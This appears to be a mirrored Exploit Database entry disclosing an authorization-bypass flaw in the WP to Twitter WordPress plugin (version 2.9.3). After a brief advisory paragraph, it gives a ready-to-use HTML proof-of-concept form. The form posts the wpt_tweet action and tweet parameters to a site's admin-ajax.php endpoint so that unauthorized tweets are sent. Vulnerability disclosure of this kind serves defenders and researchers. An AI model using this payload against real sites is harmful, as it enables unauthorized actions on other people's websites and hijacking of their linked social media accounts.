WordPress Plugin WP to Twitter – Authentication Bypass

• Exploit Database
• 117 阅读

• 作者： Voxel@Night
  日期： 2014-09-08
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39302/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19

  source: https://www.securityfocus.com/bid/69741/info   WP to Twitter Plugin for WordPress is prone to an authorization-bypass vulnerability.   An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions; this may aid in launching further attacks.   WP to Twitter 2.9.3 is vulnerable; other versions may also be affected.   <html><body> <form method="post" action="http://www.example.com/wordpress/wp-admin/admin-ajax.php"> action:<input name="action" value="wpt_tweet"><br> tweet action:<input name="tweet_action" value="tweet"><br> tweet text: <input value="" name="tweet_text"><br> tweet schedule: <input value="undefined+undefined" name="tweet_schedule"><br> tweet post id: <input value="1" name="tweet_post_id"><br> <input type="submit" value="Submit"> </form> </body></html>